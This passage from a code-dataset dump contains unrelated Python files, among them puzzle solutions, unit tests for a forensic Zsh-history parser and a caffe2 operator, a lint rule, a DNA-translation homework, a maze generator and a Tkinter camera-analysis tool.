sel_soup.findAll('img'):\n# \ttry: \n\n# \t\tsrc = i[\"src\"]\n# \t\timages.append(src)\n# \texcept:\n# \t\tpass\n\n# for src in images:\n# \tprint(src)\n\n\n\n# currPath = os.getcwd()\n\n\n# count = 1\n \n# for img in images:\n# \ttry :\n# \t\tfileName = os.path.basename(img)\n# \t\timgR = requests.get(img, Stream = True)\n# \t\tnewPath = os.join(currPath, \"images\", fileName)\n# \t\twith open(newPath, \"wb\") as outputFile:\n# \t\t\tshutil.copyfileobj(imgR.raw, outputFile)\n# \t\tdel imgR\n# \texcept:\n# \t\tpass\n\n# \tcount = count+1\n# \tprint(count)\n\n\n\n\n\n\n#driver.quit()\n#print(len(listVersion))\n\n#print(listVersion[0] == listVersion[1])\n\n\n\n\n\n\n ","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"237874225","text":"#!/usr/bin/env python3\n\"\"\"Day 14: Reindeer Olympics\n\nThis year is the Reindeer Olympics! Reindeer can fly at high speeds, but must\nrest occasionally to recover their energy. Santa would like to know which of\nhis reindeer is fastest, and so he has them race.\n\nReindeer can only either be flying (always at their top speed) or\nresting (not moving at all), and always spend whole seconds in either state.\n\nWhat is the longest distance traveled by a reindeer after a given time?\n\nPart 2:\nAt the end of each second, Santa awards one point to the reindeer currently\nin the lead. What is the score of the winning reindeer?\n\n\"\"\"\nimport re\nimport itertools\n\n\nclass Reindeer:\n def __init__(self, speed, travels, rests):\n self.speed = speed\n self.travels = travels\n self.cycle_duration = travels + rests\n\n self.score = 0\n self.traveled = 0\n\n @classmethod\n def from_string(cls, line):\n \"\"\"Create a reindeer from a string containing its speed, flight time,\n and rest time.\n\n Args:\n line (str): A line containing the reindeer's data, in format:\n can fly km/s for seconds,\n but then must rest for seconds.\n\n \"\"\"\n data = [int(number) for number in re.findall(r'\\d+', line)]\n return cls(*data)\n\n def flying(self, time):\n \"\"\"Determine if the reindeer is flying.\n\n Args:\n time (int): Current race duration in seconds.\n\n Returns:\n bool: True if the reindeer is flying, False otherwise\n\n \"\"\"\n return (time % self.cycle_duration) < self.travels\n\n def move(self, time):\n \"\"\"Move the reindeer if it is flying.\n\n Args:\n time (int): Current race duration in seconds.\n\n \"\"\"\n if self.flying(time):\n self.traveled += self.speed\n\n\ndef distance_traveled(speed, travels, rests, total_time):\n \"\"\"Calculate the distance the reindeer has flied in `total_time` seconds.\n\n Args:\n speed (int): The reindeer's speed in km/s.\n travels (int): The number of seconds the reindeer can fly before resting.\n rests (int): The number of seconds the reindeer needs to rest.\n total_time (int): The time the reindeer has for his travel.\n\n Returns:\n int: Traveled distance in km.\n\n Examples:\n >>> distance_traveled(14, 10, 127, 1000)\n 1120\n >>> distance_traveled(16, 11, 162, 1000)\n 1056\n\n \"\"\"\n full_cycles, time_left = divmod(total_time, travels + rests)\n return (full_cycles * travels + min(time_left, travels)) * speed\n\n\ndef leaders(herd):\n \"\"\"Get the reindeer who are currently in the lead.\n\n Args:\n herd (list): A list of all reindeer.\n\n Returns:\n An iterator of the reindeer currently in the lead.\n\n \"\"\"\n herd = sorted(herd, key=lambda d: d.traveled, reverse=True)\n leader_score = herd[0].traveled\n return itertools.takewhile(lambda d: d.traveled == leader_score, herd)\n\n\ndef main():\n import sys\n\n with open(sys.argv[1]) as f:\n herd = [Reindeer.from_string(line) for line in f]\n\n for time in range(int(sys.argv[2])):\n for deer in herd:\n deer.move(time)\n for leader in leaders(herd):\n leader.score += 1\n\n print(max(deer.traveled for deer in herd))\n print(max(deer.score for deer in herd))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"day14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256880433","text":"\"\"\"\r\nCopyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\r\nSPDX-License-Identifier: MIT-0\r\n\"\"\"\r\nimport re\r\nfrom cfnlint.rules import CloudFormationLintRule\r\nfrom cfnlint.rules import RuleMatch\r\n\r\n\r\nclass ResourceNameStyle(CloudFormationLintRule):\r\n \"\"\"Check if Resources follow style guide\"\"\"\r\n id = 'E9400'\r\n shortdesc = 'Resource names follow proper structure'\r\n description = 'Resources begin with a lowercase \\'r\\' and are in rCamelCase'\r\n source_url = ''\r\n tags = ['resources']\r\n\r\n def match(self, cfn):\r\n \"\"\"Check CloudFormation Resources\"\"\"\r\n\r\n matches = []\r\n pattern = re.compile(\"^([r][A-Z_0-9]+[a-zA-Z0-9]*)+$\")\r\n resources = cfn.template.get('Resources', {})\r\n if resources:\r\n for resourcename, val in resources.items():\r\n if not pattern.match(resourcename):\r\n message = 'Resource {0} should begin with a lowercase \\'r\\' and follow rCamelCase'\r\n matches.append(RuleMatch(\r\n ['Resources', resourcename],\r\n message.format(resourcename)\r\n ))\r\n return matches\r\n","sub_path":"src/cfnlint/rules/custom/ResourceNameStyle.py","file_name":"ResourceNameStyle.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"380052969","text":"#importing math\nimport math\n\n#defining pythagorean theorem function\ndef pythagorean_theorem(side_a, side_b):\n hypotenuse = math.sqrt(side_a**2 + side_b**2)\n return hypotenuse\n\n#receiving input from user\nside_a = input(\"Please input Side A: \")\nif side_a.isalpha() == True:\n print(\"Please input a positive number.\")\n exit()\nelif float(side_a) <= 0:\n print(\"Please input a positive number.\")\n exit()\nelse:\n side_a = float(side_a)\n\nside_b = input(\"Please input Side B: \")\nif side_b.isalpha() == True:\n print(\"Please input a positive number.\")\n exit()\nelif float(side_b) <= 0:\n print(\"Please input a positive number.\")\n exit()\nelse:\n side_b = float(side_b)\n\n#printing result\nprint(\"The hypotenuse is\", str(pythagorean_theorem(side_a, side_b)), \"units long.\")\n\n","sub_path":"Compute_the_Hypotenuse.py","file_name":"Compute_the_Hypotenuse.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"290278653","text":"#!/usr/bin/python\n# -*_ coding: utf-8 -*-\n\"\"\"Tests for the Zsh extended_history parser.\"\"\"\nimport unittest\n\nfrom plaso.lib import timelib\nfrom plaso.parsers import zsh_extended_history\nfrom tests.parsers import test_lib\n\n\nclass ZshExtendedHistoryTest(test_lib.ParserTestCase):\n \"\"\"Tests for the Zsh extended_history parser.\"\"\"\n\n def setUp(self):\n \"\"\"Makes preparations before running an individual test.\"\"\"\n self._parser = zsh_extended_history.ZshExtendedHistoryParser()\n\n def testParse(self):\n \"\"\"Tests for the Parse method.\"\"\"\n test_file = self._GetTestFilePath([u'zsh_extended_history.txt'])\n event_queue_consumer = self._ParseFile(self._parser, test_file)\n event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)\n\n self.assertEqual(len(event_objects), 4)\n\n event = event_objects[0]\n expected_timestamp = timelib.Timestamp.CopyFromString(\n u'2016-03-12 08:26:50')\n self.assertEqual(event.timestamp, expected_timestamp)\n self.assertEqual(event.elapsed_seconds, 0)\n self.assertEqual(event.command, u'cd plaso')\n\n event = event_objects[2]\n expected_timestamp = timelib.Timestamp.CopyFromString(\n u'2016-03-26 11:54:53')\n expected_command = u'echo dfgdfg \\\\\\\\\\n& touch /tmp/afile'\n self.assertEqual(event.timestamp, expected_timestamp)\n self.assertEqual(event.command, expected_command)\n\n event = event_objects[3]\n expected_timestamp = timelib.Timestamp.CopyFromString(\n u'2016-03-26 11:54:57')\n self.assertEqual(event.timestamp, expected_timestamp)\n\n def testVerification(self):\n \"\"\"Tests for the VerifyStructure method\"\"\"\n mediator = None\n valid_lines = u': 1457771210:0;cd plaso'\n self.assertTrue(self._parser.VerifyStructure(mediator, valid_lines))\n\n invalid_lines = u': 2016-03-26 11:54:53;0;cd plaso'\n self.assertFalse(self._parser.VerifyStructure(mediator, invalid_lines))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/parsers/zsh_extended_history.py","file_name":"zsh_extended_history.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632811381","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom caffe2.python import core\nfrom hypothesis import given\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as st\nimport numpy as np\n\n\ndef calculate_ap(predictions, labels):\n N, D = predictions.shape\n ap = np.zeros(D)\n num_range = np.arange((N), dtype=np.float32) + 1\n for k in range(D):\n scores = predictions[:N, k]\n label = labels[:N, k]\n sortind = np.argsort(-scores, kind='mergesort')\n truth = label[sortind]\n precision = np.cumsum(truth) / num_range\n ap[k] = precision[truth.astype(np.bool)].sum() / max(1, truth.sum())\n return ap\n\n\nclass TestAPMeterOps(hu.HypothesisTestCase):\n @given(predictions=hu.arrays(dims=[10, 3],\n elements=st.floats(allow_nan=False,\n allow_infinity=False,\n min_value=0.1,\n max_value=1)),\n labels=hu.arrays(dims=[10, 3],\n dtype=np.int32,\n elements=st.integers(min_value=0,\n max_value=1)),\n **hu.gcs_cpu_only)\n def test_average_precision(self, predictions, labels, gc, dc):\n op = core.CreateOperator(\n \"APMeter\",\n [\"predictions\", \"labels\"],\n [\"AP\"],\n buffer_size=10,\n )\n\n def op_ref(predictions, labels):\n ap = calculate_ap(predictions, labels)\n return (ap, )\n\n self.assertReferenceChecks(\n device_option=gc,\n op=op,\n inputs=[predictions, labels],\n reference=op_ref)\n\n @given(predictions=hu.arrays(dims=[10, 3],\n elements=st.floats(allow_nan=False,\n allow_infinity=False,\n min_value=0.1,\n max_value=1)),\n labels=hu.arrays(dims=[10, 3],\n dtype=np.int32,\n elements=st.integers(min_value=0,\n max_value=1)),\n **hu.gcs_cpu_only)\n def test_average_precision_small_buffer(self, predictions, labels, gc, dc):\n op_small_buffer = core.CreateOperator(\n \"APMeter\",\n [\"predictions\", \"labels\"],\n [\"AP\"],\n buffer_size=5,\n )\n\n def op_ref(predictions, labels):\n # We can only hold the last 5 in the buffer\n ap = calculate_ap(predictions[5:], labels[5:])\n return (ap, )\n\n self.assertReferenceChecks(\n device_option=gc,\n op=op_small_buffer,\n inputs=[predictions, labels],\n reference=op_ref\n )\n","sub_path":"caffe2/python/operator_test/apmeter_test.py","file_name":"apmeter_test.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"518750038","text":"def f(a,b):\n return a+b\n \ndef dict_interdiff(d1, d2):\n '''\n d1, d2: dicts whose keys and values are integers\n Returns a tuple of dictionaries according to the instructions above\n Write a function called dict_interdiff that takes in two dictionaries (d1 and d2). \n The function will return a tuple of two dictionaries: \n a dictionary of the intersect of d1 and d2 and a dictionary of the difference of d1 and d2, \n calculated as follows:\n\n intersect: The keys to the intersect dictionary are keys that are common in both d1 and d2. \n To get the values of the intersect dictionary, \n look at the common keys in d1 and d2 and apply the function f to these keys' values -- \n the value of the common key in d1 is the first parameter to the function and the value of\n the common key in d2 is the second parameter to the function. Do not implement f inside your\n dict_interdiff code -- assume it is defined outside.\n difference: a key-value pair in the difference dictionary is (a) every key-value pair in d1\n whose key appears only in d1 and not in d2 or (b) every key-value pair in d2 whose key appears\n only in d2 and not in d1.\n '''\n # Your code here\n intersection = {}\n difference = {}\n for a,b in d1.iteritems():\n for c,d in d2.iteritems():\n if a == c:\n intersection[a] = f(b,d)\n else: \n difference[a] = b\n difference[c] = d\n updatedDifference = difference.copy()\n for a in difference:\n if a in intersection:\n \n del updatedDifference[a] \n #print intersection\n #print difference1\n answer = (intersection,updatedDifference)\n #print answer\n return answer","sub_path":"Quiz/prob7.py","file_name":"prob7.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568535586","text":"\"\"\"\"\n\nЗадание 1\n\n0) Повторение понятий из биологии (ДНК, РНК, нуклеотид, протеин, кодон)\n\n1) Построение статистики по входящим в последовательность ДНК нуклеотидам \nдля каждого гена (например: [A - 46, C - 66, G - 23, T - 34])\n\n2) Перевод последовательности ДНК в РНК (окей, Гугл)\n\n3) Перевод последовательности РНК в протеин*\n\n\n*В папке files вы найдете файл rna_codon_table.txt - \nв нем содержится таблица переводов кодонов РНК в аминокислоту, \nсоставляющую часть полипептидной цепи белка.\n\n\nВход: файл dna.fasta с n-количеством генов\n\nВыход - 3 файла:\n - статистика по количеству нуклеотидов в ДНК\n - последовательность РНК для каждого гена\n - последовательность кодонов для каждого гена\n\n ** Если вы умеете в matplotlib/seaborn или еще что, \n welcome за дополнительными баллами за\n гистограммы по нуклеотидной статистике.\n (Не забудьте подписать оси)\n\nP.S. За незакрытый файловый дескриптор - караем штрафным дезе.\n\n\"\"\"\n\nimport json\nimport matplotlib.pyplot as plt\n\n\nwith open(\"./files/rna_codon_table.txt\", \"r\") as rna_codon_table_file:\n name_genom = None\n key = False\n condon_dict = {}\n\n for line in rna_codon_table_file:\n for item in line.split():\n if key:\n condon_dict[key] = item\n key = False\n else:\n key = item\n\n\ndef count_nucleotides(dna: dict):\n\n DNA_symbols = ('A', 'C', 'G', 'T')\n dna_stat = {}\n\n for key, value in dna.items():\n dna_stat[key] = [(DNA_symbol, value.count(DNA_symbol)) for DNA_symbol in DNA_symbols]\n return dna_stat\n\n\ndef my_replace(s: str, old, new):\n\n s.split(old)\n return new.join(s.split(old))\n\n\ndef translate_from_dna_to_rna(dna: dict):\n\n rna = {}\n for key, value in dna.items():\n rna_value = my_replace(value, 'T', 'U')\n rna[key] = rna_value[:(len(rna_value)//3) * 3]\n return rna\n\n\ndef rna_to_protein(rna_str: str):\n\n global condon_dict\n i = 0\n res = ''\n while i != len(rna_str):\n res += condon_dict[rna_str[i:i+3]]\n i += 3\n return res\n\n\ndef translate_rna_to_protein(rna):\n\n protein = {}\n for key, value in rna.items():\n protein[key] = rna_to_protein(value)\n return protein\n\n\nif __name__ == '__main__':\n\n dna = {}\n with open(\"./files/dna.fasta\", \"r\") as dna_file:\n name_genom = None\n for line in dna_file:\n if line[0] == '>':\n name_genom = line.replace('\\n', '')\n dna[name_genom] = ''\n else:\n dna[name_genom] += line.replace('\\n', '')\n\n dna_stat = count_nucleotides(dna)\n list_data = [('A', 217), ('C', 409), ('G', 373), ('T', 232)]\n\n for key, value in dna_stat.items():\n plt.figure()\n plt.bar([val[0] for val in value], [val[1] for val in value])\n plt.title(key)\n plt.xlabel('Нуклеотид')\n plt.ylabel('Частота')\n plt.savefig(str(key)+'.png')\n\n\n rna = translate_from_dna_to_rna(dna)\n protein = translate_rna_to_protein(rna)\n\n with open('dna_stat.json', 'w') as file:\n json.dump(dna_stat, file, indent=4)\n with open('rna.json', 'w') as file:\n json.dump(rna, file, indent=4)\n with open('protein.json', 'w') as file:\n json.dump(protein, file, indent=4)\n","sub_path":"homework_strings.py","file_name":"homework_strings.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"488988729","text":"from tkinter import *\nfrom tkinter import messagebox as tkMessageBox, filedialog\nfrom take_image import take_image\nfrom add_camera import check_existance, create_CameraInfo_file, return_camera_list, read_camera_info_file, check_roi_image_existance, save_roi_info\nfrom video_analysis import VideoAnalysis\nfrom region_select import region_select\nimport os\nimport json\nimport cv2\n\nMode = \"video\"; roi_image_checker = 0\n\n\ndef add_camera():\n\tvalue1 = addr.get()\n\tvalue2 = passw.get()\n\tif check_existance(value1) == True:\n\t\ttkMessageBox.showinfo(\"existed\", \"The camera already existed.\")\n\telse:\n\t\ttkMessageBox.askquestion(\"Delete\", \"Doulbe check your camera information!!\", icon='warning')\n\t\tif 'yes':\n\t\t\tcreate_CameraInfo_file(value1, value2)\n\t\t\tprint(\"new camera added!\")\n\t\telse:\n\t\t\tprint(\"I'm Not Deleted Yet\")\n\t\ndef create_cameralist_window():\n\twindow = Toplevel(secondFrame)\n\tcamera_list = return_camera_list()\n\n\tfor idx, camera_ip in enumerate(camera_list):\n\t\tb = Button(window, text=camera_ip, command= lambda camera_ip = camera_ip: create_taking_window(camera_ip))\n\t\tb.grid(row=idx, column=0)\n\n\n\tdef create_taking_window(camera_ip):\n\t\tglobal roi_image_checker\n\t\t#video_default_setting\n\t\tpath = os.getcwd() + '/Cameras/' + camera_ip\n\t\tcamera_info = read_camera_info_file(camera_ip)\n\t\tdef check_roi_image_existance(ip):\n\t\t\tCamera_path = os.getcwd() + '/Cameras/' + ip\n\t\t\tchecker = []\n\t\t\tfor File in os.listdir(Camera_path):\n\t\t\t\t# print(File)\n\t\t\t if File.endswith('.jpg'):\n\t\t\t \tchecker.append(File)\n\t\t\treturn len(checker)\n\t\troi_image_checker = check_roi_image_existance(camera_ip)\n\n\n\t\tdef mode_swtich_toggle():\n\t\t\tglobal Mode\n\t\t\tif t_btn.config('text')[-1] == 'video':\n\t\t\t t_btn.config(text='photo')\n\t\t\t Mode = \"photo\"\n\t\t\telse:\n\t\t\t t_btn.config(text='video')\n\t\t\t Mode = \"video\"\n\n\n\t\tdef update_video_duration():\n\t\t\tnew_time = [0,0,0]\n\t\t\th = time1.get()\n\t\t\tm = time2.get()\n\t\t\ts = time3.get()\n\n\t\t\tif Mode == 'photo':\n\t\t\t\ttime = 'N/A'\n\t\t\telse:\n\t\t\t\tif not h:\n\t\t\t\t\tnew_time[0] = '00'\n\t\t\t\tif h:\n\t\t\t\t\tnew_time[0] = str(h).zfill(2)\n\t\t\t\tif not h:\n\t\t\t\t\tnew_time[1] = '00'\n\t\t\t\tif m:\n\t\t\t\t\tnew_time[1] = str(m).zfill(2)\n\t\t\t\tif not s:\n\t\t\t\t\tnew_time[2] = '00'\n\t\t\t\tif s:\n\t\t\t\t\tnew_time[2] = str(s).zfill(2)\n\n\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t# password\n\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\ttmp = json_data[\"video_length\"]\n\t\t\t\tjson_data[\"video_length\"] = new_time\n\n\t\t\twith open(json_file_path, \"w\") as json_file:\n\t\t\t\tjson.dump(json_data, json_file)\n\n\n\t\tdef get_video_image_taking():\n\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t# password\n\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\tduration = json_data[\"video_length\"]\n\n\t\t\ttake_image(camera_ip, camera_info[\"password\"], os.getcwd() + '/Cameras/' + camera_ip, '1280x720', '30',\n\t\t\t\t\t duration[0] + ':' + duration[1] + ':' + duration[2], Mode)\n\n\t\tcamera_info_window = Toplevel(window)\n\n\t\tt_btn = Button(camera_info_window, text=\"video\", width=12, command=mode_swtich_toggle)\n\t\tt_btn.grid(row=3, column=0)\n\n\n\t\timage_taking = Button(camera_info_window, text='taking', width=12, command=get_video_image_taking)\n\t\timage_taking.grid(row=5, column=0)\n\n\t\tdef create_analysis_window():\n\t\t\tana_window = Toplevel(camera_info_window)\n\n\t\t\tdef update_resolution():\n\t\t\t\tvalue = resolution_options[choice.get()]\n\t\t\t\tlabel_reso.config(text=(str(value[0]) + ' x ' + str(value[1])))\n\t\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t\t# password\n\t\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\t\ttmp = json_data[\"resolution\"]\n\t\t\t\t\tjson_data[\"resolution\"] = value\n\n\t\t\t\twith open(json_file_path, \"w\") as json_file:\n\t\t\t\t\tjson.dump(json_data, json_file)\n\n\t\t\tdef update_frame_rate():\n\t\t\t\tvalue = fr_options[choice_fr.get()]\n\t\t\t\tlabel_fr.config(text=(value))\n\t\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t\t# password\n\t\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\t\tjson_data = json.load(json_file)\n\t\t\t\t\ttmp = json_data[\"frame_rate\"]\n\t\t\t\t\tjson_data[\"frame_rate\"] = value\n\n\t\t\t\twith open(json_file_path, \"w\") as json_file:\n\t\t\t\t\tjson.dump(json_data, json_file)\n\n\t\t\tdef anay_video():\n\t\t\t\tin_path = filedialog.askopenfilename(initialdir= \"./Cameras/\" + camera_ip + \"/Videos\")\n\t\t\t\tout_path = \"./Cameras/\" + camera_ip + \"/Videos\" + '/out_temp.mp4'\n\t\t\t\tjson_file_path = \"./Cameras/\" + camera_ip + \"/\" + camera_ip + \"_metadata.json\"\n\t\t\t\t# password\n\t\t\t\twith open(json_file_path, \"r\") as json_file:\n\t\t\t\t\tjson_data = json.load(json_file)\n\n\t\t\t\tcap = cv2.VideoCapture(in_path)\n\t\t\t\tflag, frame = cap.read()\n\t\t\t\tcv2.imwrite('./Cameras/' + camera_ip + '/temp.jpg', frame)\n\t\t\t\tori_reso = (frame.shape[1], frame.shape[0])\n\t\t\t\tx, _ = region_select(camera_ip)\n\t\t\t\tos.remove('./Cameras/' + camera_ip + '/temp.jpg')\n\n\t\t\t\tVA = VideoAnalysis(in_path, out_path, json_data['resolution'], ori_reso, 30, json_data['frame_rate'],\n\t\t\t\t\t\t\t\t sorted_refPt=x)\n\t\t\t\tVA.mask_video()\n\t\t\t\tarr = VA.mask_rcnn_apply()\n\t\t\t\tinterested_frame = VA.find_interested_frames(arr, 2)\n\t\t\t\tVA.clip_video(interested_frame)\n\n\t\t\t# resolution option menu\n\t\t\tresolution_options = {'high': (1280,720), 'median': (800,600), 'low': (640,400)}\n\t\t\tchoice = StringVar()\n\t\t\tchoice.set(\"high\") # default value, to use value: choice.get()\n\t\t\tLabel(ana_window, text='resolution').grid(row=1)\n\t\t\tpopupChoice = OptionMenu(ana_window, choice, *resolution_options, command=lambda x:update_resolution())\n\t\t\tpopupChoice.grid(row=1, column=1)\n\t\t\tlabel_reso = Label(ana_window, text=str(resolution_options[choice.get()][0])+' x '+str(resolution_options[choice.get()][1]))\n\t\t\tlabel_reso.grid(row=1, column=2)\n\n\t\t\tfr_options = {'5': 5, '2': 2, '1': 1}\n\t\t\tchoice_fr = StringVar()\n\t\t\tchoice_fr.set(\"1\") # default value, to use value: choice.get()\n\t\t\tLabel(ana_window, text='framerate').grid(row=2)\n\t\t\tpopupChoice = OptionMenu(ana_window, choice_fr, *fr_options, command=lambda x:update_frame_rate())\n\t\t\tpopupChoice.grid(row=2, column=1)\n\t\t\tlabel_fr = Label(ana_window, text=fr_options[choice_fr.get()])\n\t\t\tlabel_fr.grid(row=2, column=2)\n\n\t\t\tana_butt = Button(ana_window, text='process video', command=anay_video)\n\t\t\tana_butt.grid(row=3, column=0)\n\n\n\t\ttime_label = Label(camera_info_window, text='video time').grid(row=0)\n\t\tt1 = StringVar()\n\t\ttime1 = Entry(camera_info_window, textvariable=t1,width=5)\n\t\ttime1.grid(row=0, column=1) # grid is more useful for more customization\n\t\tlabel1 = Label(camera_info_window, text=':').grid(row=0, column=2)\n\t\tif roi_image_checker > 0:\n\t\t\ttime1.config(state = NORMAL)\n\t\telse:\n\t\t\ttime1.config(state = DISABLED)\n\n\t\tt2 = StringVar()\n\t\ttime2 = Entry(camera_info_window, textvariable=t2,width=5)\n\t\ttime2.grid(row=0, column=3) # grid is more useful for more customization\n\t\tlabel2 = Label(camera_info_window, text=':').grid(row=0, column=4)\n\t\tif roi_image_checker > 0:\n\t\t\ttime2.config(state = NORMAL)\n\t\telse:\n\t\t\ttime2.config(state = DISABLED)\n\n\t\tt3 = StringVar()\n\t\ttime3 = Entry(camera_info_window, textvariable=t3, width=5)\n\t\ttime3.grid(row=0, column=5) # grid is more useful for more customization\n\t\tif roi_image_checker > 0:\n\t\t\ttime3.config(state = NORMAL)\n\t\telse:\n\t\t\ttime3.config(state = DISABLED)\n\n\t\tadd_ip_info = Button(camera_info_window, command=update_video_duration, text='update_time')\n\t\tadd_ip_info.grid(row=0, column=6)\n\n\t\troi_taking = Button(camera_info_window, text='roi_taking', command=lambda:save_roi_info(camera_ip))\n\t\troi_taking.grid(row=4, column=0)\n\t\tif roi_image_checker > 0:\n\t\t\troi_taking.config(state = NORMAL)\n\t\telse:\n\t\t\troi_taking.config(state = DISABLED)\n\n\t\tana_butt = Button(camera_info_window, text='analysis video', command=create_analysis_window)\n\t\tana_butt.grid(row=4, column=1)\n\n\n\nsecondFrame = Tk()\n# entry for value\naddr = StringVar()\nip_address = Entry(secondFrame, textvariable=addr).grid(row=0, column=1) # grid is more useful for more customization\nip_label = Label(secondFrame, text='ip').grid(row=0)\n\npassw = StringVar()\nip_password = Entry(secondFrame, textvariable=passw).grid(row=1, column=1) # grid is more useful for more customization\npassw_label = Label(secondFrame, text='password').grid(row=1)\n\n\nadd_ip_info = Button(secondFrame, command=add_camera, text='add').grid(row=0, column=2)\n\n# label showing result or other text\n\n\nb = Button(secondFrame, text=\"check existed cameras\", command=create_cameralist_window).grid(row=1, column=2)\n\n\n\nsecondFrame.mainloop()","sub_path":"Mask-RCNN/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"253491133","text":"# mazeGenerator.py includes functions directly related to the maze\n# need random number generator for obstacleDensity\nfrom random import random\nfrom random import randint\n\n# grid is just list of ints, if 0 then the grid is free, if 1 then its blocked, if -1 then it is on fire\n#if the entry is 2, then the agent is present\n\n\n# just populates a maze based on dimension and obstacleDensity\n# if dim<2 then exception raised\n# obstacleDensity is a probability from 0 to 1, if anything else inputted, then exception is raised\n\n\ndef generateMaze(dim, obstacleDensity):\n if dim<2:\n raise ValueError(\"Dimension cannot be less than 2!\")\n if obstacleDensity<0 or obstacleDensity>1:\n raise ValueError(\"Blocking factor must be a probability from 0 to 1!\")\n # so far we passed checks, so generating list\n maze=[]\n for i in range(dim):\n toAdd=[]\n for j in range(dim):\n if i==0 and j==0:\n # top left corner is the start\n toAdd.append(0)\n elif i==dim-1 and j==dim-1:\n # bottom right corner is the end\n toAdd.append(0)\n else:\n # generating random number for obstacleDensity probability\n randomNumber = random()\n if randomNumber1:\n raise ValueError(\"Flammability rate must be between 0 and 1 (inclusive)!\")\n # iterating and adjusting fire\n for i in range(dim):\n for j in range(dim):\n if maze[i][j]!=1 and maze[i][j]!=-1:\n # then I need to check neighbors\n neighbors = []\n numFire=0\n neighbors.append((i+1, j))\n neighbors.append((i-1, j))\n neighbors.append((i, j+1))\n neighbors.append((i, j-1))\n for neighbor in neighbors:\n if neighbor[0]=0 and neighbor[1]=0:\n # then this is valid neighbor to check\n if maze[neighbor[0]][neighbor[1]]==-1:\n numFire += 1\n probFire = 1-((1-flammabilityRate)**numFire)\n if random() a:\n print(\" b is greater than a \")\n\n # python elif statement\n a = 45\n b = 77\n if b > a:\n print(\"b is greater than a\")\n elif a == b:\n print(\"a and b are equal\")\n\n# python while loops\ni = 0\nwhile i <= 100:\n i = i + 1\n print(i)\n\n # Program to find the sum of all numbers stored in a list\n\n # List of numbers\n numbers = [6, 5, 3, 8, 4, 2, 5, 4, 11]\n\n # variable to store the sum\n sum = 0\n\n # iterate over the list\n for val in numbers:\n sum = sum + val\n\n print(\"The sum is\", sum)\n\n\n# Creating a function\ndef my_function():\n print(\"Print hello from a function \")\n my_function()\n\n def my_names(fname):\n print(fname + \"Omondi\")\n my_names(\"Felix\")\n my_names(\"Vincent\")\n my_names(\"Erick\")\n","sub_path":"Python1/LIST.py","file_name":"LIST.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"349688035","text":"import sys\nimport ffmpeg\n\nfrom libs.task import task\n\nvalidator = {\n 'input': {\n 'type': str,\n 'required': True,\n 'help': 'Input file path',\n },\n 'output': {\n 'type': str,\n 'required': True,\n 'help': 'Output file path',\n },\n}\n\n\n@task(\n name='transcoding',\n title='Транскодирование видео из mov в mp4',\n validator=validator\n)\ndef transcoding(input, output):\n try:\n (ffmpeg\n .input(input)\n .output(output, vcodec='copy', acodec='copy')\n .overwrite_output()\n .run()\n )\n return output\n except ffmpeg.Error as e:\n print(e.stderr.decode(), file=sys.stderr)\n sys.exit(1)\n","sub_path":"tasks/transcoding.py","file_name":"transcoding.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"245633964","text":"from agent_dir.agent import Agent\nimport scipy\nimport numpy as np\n#import matplotlib.pyplot as plt\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Reshape, Flatten, Input\nfrom keras.optimizers import RMSprop\nfrom keras.layers.convolutional import 